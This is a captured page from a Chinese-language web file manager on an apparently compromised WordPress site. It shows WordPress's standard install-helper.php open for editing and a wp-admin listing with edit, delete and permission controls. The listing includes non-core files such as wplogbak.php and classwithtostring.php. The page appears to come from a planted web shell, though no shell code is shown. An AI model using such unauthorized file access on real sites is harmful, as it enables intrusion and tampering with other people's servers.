编辑:install-helper.php
<?php /** * Plugins may load this file to gain access to special helper functions * for plugin installation. This file is not included by WordPress and it is * recommended, to prevent fatal errors, that this file is included using * require_once. * * These functions are not optimized for speed, but they should only be used * once in a while, so speed shouldn't be a concern. If it is and you are * needing to use these functions a lot, you might experience timeouts. * If you do, then it is advised to just write the SQL code yourself. * * check_column( 'wp_links', 'link_description', 'mediumtext' ); * * if ( check_column( $wpdb->comments, 'comment_author', 'tinytext' ) ) { * echo "ok\n"; * } * * // Check the column. * if ( ! check_column( $wpdb->links, 'link_description', 'varchar( 255 )' ) ) { * $ddl = "ALTER TABLE $wpdb->links MODIFY COLUMN link_description varchar(255) NOT NULL DEFAULT '' "; * $q = $wpdb->query( $ddl ); * } * * $error_count = 0; * $tablename = $wpdb->links; * * if ( check_column( $wpdb->links, 'link_description', 'varchar( 255 )' ) ) { * $res .= $tablename . ' - ok <br />'; * } else { * $res .= 'There was a problem with ' . $tablename . '<br />'; * ++$error_count; * } * * @package WordPress * @subpackage Plugin */ /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; if ( ! function_exists( 'maybe_create_table' ) ) : /** * Creates a table in the database if it doesn't already exist. * * @since 1.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $table_name Database table name. * @param string $create_ddl SQL statement to create table. * @return bool True on success or if the table already exists. False on failure. */ function maybe_create_table( $table_name, $create_ddl ) { global $wpdb; foreach ( $wpdb->get_col( 'SHOW TABLES', 0 ) as $table ) { if ( $table === $table_name ) { return true; } } // Didn't find it, so try to create it. // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- No applicable variables for this query. $wpdb->query( $create_ddl ); // We cannot directly tell whether this succeeded! foreach ( $wpdb->get_col( 'SHOW TABLES', 0 ) as $table ) { if ( $table === $table_name ) { return true; } } return false; } endif; if ( ! function_exists( 'maybe_add_column' ) ) : /** * Adds column to database table, if it doesn't already exist. * * @since 1.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $table_name Database table name. * @param string $column_name Table column name. * @param string $create_ddl SQL statement to add column. * @return bool True on success or if the column already exists. False on failure. */ function maybe_add_column( $table_name, $column_name, $create_ddl ) { global $wpdb; // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Cannot be prepared. Fetches columns for table names. foreach ( $wpdb->get_col( "DESC $table_name", 0 ) as $column ) { if ( $column === $column_name ) { return true; } } // Didn't find it, so try to create it. // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- No applicable variables for this query. $wpdb->query( $create_ddl ); // We cannot directly tell whether this succeeded! // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Cannot be prepared. Fetches columns for table names. foreach ( $wpdb->get_col( "DESC $table_name", 0 ) as $column ) { if ( $column === $column_name ) { return true; } } return false; } endif; /** * Drops column from database table, if it exists. * * @since 1.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $table_name Database table name. * @param string $column_name Table column name. * @param string $drop_ddl SQL statement to drop column. * @return bool True on success or if the column doesn't exist. False on failure. */ function maybe_drop_column( $table_name, $column_name, $drop_ddl ) { global $wpdb; // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Cannot be prepared. Fetches columns for table names. foreach ( $wpdb->get_col( "DESC $table_name", 0 ) as $column ) { if ( $column === $column_name ) { // Found it, so try to drop it. // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- No applicable variables for this query. $wpdb->query( $drop_ddl ); // We cannot directly tell whether this succeeded! // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Cannot be prepared. Fetches columns for table names. foreach ( $wpdb->get_col( "DESC $table_name", 0 ) as $column ) { if ( $column === $column_name ) { return false; } } } } // Else didn't find it. return true; } /** * Checks that database table column matches the criteria. * * Uses the SQL DESC for retrieving the table info for the column. It will help * understand the parameters, if you do more research on what column information * is returned by the SQL statement. Pass in null to skip checking that criteria. * * Column names returned from DESC table are case sensitive and are as listed: * * - Field * - Type * - Null * - Key * - Default * - Extra * * @since 1.0.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $table_name Database table name. * @param string $col_name Table column name. * @param string $col_type Table column type. * @param bool $is_null Optional. Check is null. * @param mixed $key Optional. Key info. * @param mixed $default_value Optional. Default value. * @param mixed $extra Optional. Extra value. * @return bool True, if matches. False, if not matching. */ function check_column( $table_name, $col_name, $col_type, $is_null = null, $key = null, $default_value = null, $extra = null ) { global $wpdb; $diffs = 0; // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared -- Cannot be prepared. Fetches columns for table names. $results = $wpdb->get_results( "DESC $table_name" ); foreach ( $results as $row ) { if ( $row->Field === $col_name ) { // Got our column, check the params. if ( ( null !== $col_type ) && ( $row->Type !== $col_type ) ) { ++$diffs; } if ( ( null !== $is_null ) && ( $row->Null !== $is_null ) ) { ++$diffs; } if ( ( null !== $key ) && ( $row->Key !== $key ) ) { ++$diffs; } if ( ( null !== $default_value ) && ( $row->Default !== $default_value ) ) { ++$diffs; } if ( ( null !== $extra ) && ( $row->Extra !== $extra ) ) { ++$diffs; } if ( $diffs > 0 ) { return false; } return true; } // End if found our column. } return false; }
保存文件
位置:
home
/
fembzvrs
/
zimeza.com
/
wp-admin
批量上传
创建
创建
批量权限
批量删除
名称
权限
大小
修改时间
操作
↑ 返回上级
-
-
-
-
css
drwxr-xr-x
-
2025-07-06 02:11
权限
删除
重命名
images
drwxr-xr-x
-
2025-12-03 02:17
权限
删除
重命名
includes
drwxr-xr-x
-
2025-07-06 02:11
权限
删除
重命名
js
drwxr-xr-x
-
2026-05-12 03:22
权限
删除
重命名
maint
drwxr-xr-x
-
2025-07-06 02:11
权限
删除
重命名
network
drwxr-xr-x
-
2026-05-14 02:05
权限
删除
重命名
user
drwxr-xr-x
-
2026-05-14 05:00
权限
删除
重命名
about.php
-rw-r--r--
17.74 KB
2026-03-12 02:16
编辑
下载
权限
删除
重命名
admin-ajax.php
-rw-r--r--
5.03 KB
2024-07-04 15:22
编辑
下载
权限
删除
重命名
admin-footer.php
-rw-r--r--
2.77 KB
2024-09-26 19:41
编辑
下载
权限
删除
重命名
admin-functions.php
-rw-r--r--
479 B
2025-01-22 19:06
编辑
下载
权限
删除
重命名
admin-header.php
-rw-r--r--
9.12 KB
2025-01-24 15:58
编辑
下载
权限
删除
重命名
admin-post.php
-rw-r--r--
1.97 KB
2025-01-16 21:18
编辑
下载
权限
删除
重命名
admin.php
-rw-r--r--
12.35 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
async-upload.php
-rw-r--r--
5.47 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
authorize-application.php
-rw-r--r--
10.09 KB
2023-09-14 04:54
编辑
下载
权限
删除
重命名
classwithtostring.php
-rw-r--r--
7.73 KB
2026-05-12 02:50
编辑
下载
权限
删除
重命名
comment.php
-rw-r--r--
11.35 KB
2024-05-01 22:01
编辑
下载
权限
删除
重命名
contribute.php
-rw-r--r--
5.86 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
credits.php
-rw-r--r--
4.38 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
custom-background.php
-rw-r--r--
489 B
2025-01-22 19:06
编辑
下载
权限
删除
重命名
custom-header.php
-rw-r--r--
499 B
2025-01-22 19:06
编辑
下载
权限
删除
重命名
customize.php
-rw-r--r--
11.01 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
edit-comments.php
-rw-r--r--
14.38 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
edit-form-advanced.php
-rw-r--r--
28.83 KB
2025-03-19 00:09
编辑
下载
权限
删除
重命名
edit-form-blocks.php
-rw-r--r--
14.6 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
edit-form-comment.php
-rw-r--r--
8.34 KB
2024-11-12 01:43
编辑
下载
权限
删除
重命名
edit-link-form.php
-rw-r--r--
6.21 KB
2025-02-08 16:44
编辑
下载
权限
删除
重命名
edit-tag-form.php
-rw-r--r--
10.44 KB
2024-12-06 22:07
编辑
下载
权限
删除
重命名
edit-tags.php
-rw-r--r--
22 KB
2025-01-29 22:40
编辑
下载
权限
删除
重命名
edit.php
-rw-r--r--
19.48 KB
2024-10-04 02:46
编辑
下载
权限
删除
重命名
erase-personal-data.php
-rw-r--r--
7.33 KB
2024-04-18 00:21
编辑
下载
权限
删除
重命名
export-personal-data.php
-rw-r--r--
7.75 KB
2024-04-18 00:21
编辑
下载
权限
删除
重命名
export.php
-rw-r--r--
11.02 KB
2024-05-27 00:51
编辑
下载
权限
删除
重命名
freedoms.php
-rw-r--r--
4.8 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
google8898db46e0de83e8.html
-rw-r--r--
53 B
2026-05-12 06:17
编辑
下载
权限
删除
重命名
import.php
-rw-r--r--
7.58 KB
2025-02-25 23:34
编辑
下载
权限
删除
重命名
install-helper.php
-rw-r--r--
6.8 KB
2022-11-20 19:10
编辑
下载
权限
删除
重命名
install.php
-rw-r--r--
17.77 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
link-add.php
-rw-r--r--
934 B
2025-02-08 16:44
编辑
下载
权限
删除
重命名
link-manager.php
-rw-r--r--
4.26 KB
2025-02-08 16:44
编辑
下载
权限
删除
重命名
link-parse-opml.php
-rw-r--r--
2.72 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
link.php
-rw-r--r--
2.89 KB
2024-05-01 22:01
编辑
下载
权限
删除
重命名
load-scripts.php
-rw-r--r--
2.02 KB
2024-08-26 03:48
编辑
下载
权限
删除
重命名
load-styles.php
-rw-r--r--
2.92 KB
2024-11-04 20:51
编辑
下载
权限
删除
重命名
media-new.php
-rw-r--r--
3.2 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
media-upload.php
-rw-r--r--
3.58 KB
2025-02-08 20:53
编辑
下载
权限
删除
重命名
media.php
-rw-r--r--
819 B
2024-05-01 22:01
编辑
下载
权限
删除
重命名
menu-header.php
-rw-r--r--
9.82 KB
2025-02-21 02:29
编辑
下载
权限
删除
重命名
menu.php
-rw-r--r--
17.46 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
moderation.php
-rw-r--r--
307 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-admin.php
-rw-r--r--
196 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-delete-site.php
-rw-r--r--
4.5 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
ms-edit.php
-rw-r--r--
216 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-options.php
-rw-r--r--
229 B
2024-06-22 15:47
编辑
下载
权限
删除
重命名
ms-sites.php
-rw-r--r--
215 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-themes.php
-rw-r--r--
217 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-upgrade-network.php
-rw-r--r--
219 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
ms-users.php
-rw-r--r--
215 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
my-sites.php
-rw-r--r--
4.74 KB
2023-09-05 23:26
编辑
下载
权限
删除
重命名
nav-menus.php
-rw-r--r--
48.19 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
network.php
-rw-r--r--
5.39 KB
2024-03-09 03:38
编辑
下载
权限
删除
重命名
options-discussion.php
-rw-r--r--
15.92 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options-general.php
-rw-r--r--
21.65 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options-head.php
-rw-r--r--
621 B
2025-01-22 19:06
编辑
下载
权限
删除
重命名
options-media.php
-rw-r--r--
6.38 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options-permalink.php
-rw-r--r--
21.22 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options-privacy.php
-rw-r--r--
9.95 KB
2025-01-21 03:04
编辑
下载
权限
删除
重命名
options-reading.php
-rw-r--r--
9.94 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options-writing.php
-rw-r--r--
9.1 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
options.php
-rw-r--r--
13.6 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
plugin-editor.php
-rw-r--r--
13.75 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
plugin-install.php
-rw-r--r--
6.96 KB
2024-02-20 12:27
编辑
下载
权限
删除
重命名
plugins.php
-rw-r--r--
30 KB
2025-02-08 16:44
编辑
下载
权限
删除
重命名
post-new.php
-rw-r--r--
2.7 KB
2024-06-15 16:34
编辑
下载
权限
删除
重命名
post.php
-rw-r--r--
10.03 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
press-this.php
-rw-r--r--
2.34 KB
2024-02-27 01:35
编辑
下载
权限
删除
重命名
privacy-policy-guide.php
-rw-r--r--
3.67 KB
2023-11-22 22:44
编辑
下载
权限
删除
重命名
privacy.php
-rw-r--r--
2.79 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
profile.php
-rw-r--r--
283 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
revision.php
-rw-r--r--
5.7 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
setup-config.php
-rw-r--r--
17.48 KB
2025-01-13 19:57
编辑
下载
权限
删除
重命名
site-editor.php
-rw-r--r--
11.98 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
site-health-info.php
-rw-r--r--
3.99 KB
2025-02-22 17:12
编辑
下载
权限
删除
重命名
site-health.php
-rw-r--r--
10.2 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
theme-editor.php
-rw-r--r--
16.87 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
theme-install.php
-rw-r--r--
23.38 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
themes.php
-rw-r--r--
47.92 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
tools.php
-rw-r--r--
3.43 KB
2023-02-23 15:38
编辑
下载
权限
删除
重命名
update-core.php
-rw-r--r--
45.45 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
upgrade-functions.php
-rw-r--r--
341 B
2020-02-06 11:33
编辑
下载
权限
删除
重命名
upgrade.php
-rw-r--r--
6.27 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
upload.php
-rw-r--r--
14.9 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
user-edit.php
-rw-r--r--
40.36 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
user-new.php
-rw-r--r--
24.05 KB
2025-03-03 04:35
编辑
下载
权限
删除
重命名
users.php
-rw-r--r--
23.29 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
widgets-form-blocks.php
-rw-r--r--
5.12 KB
2025-12-03 02:17
编辑
下载
权限
删除
重命名
widgets-form.php
-rw-r--r--
19.29 KB
2026-02-04 02:17
编辑
下载
权限
删除
重命名
widgets.php
-rw-r--r--
1.09 KB
2022-03-22 23:59
编辑
下载
权限
删除
重命名
wplogbak.php
-rw-r--r--
7.73 KB
2026-05-13 06:50
编辑
下载
权限
删除
重命名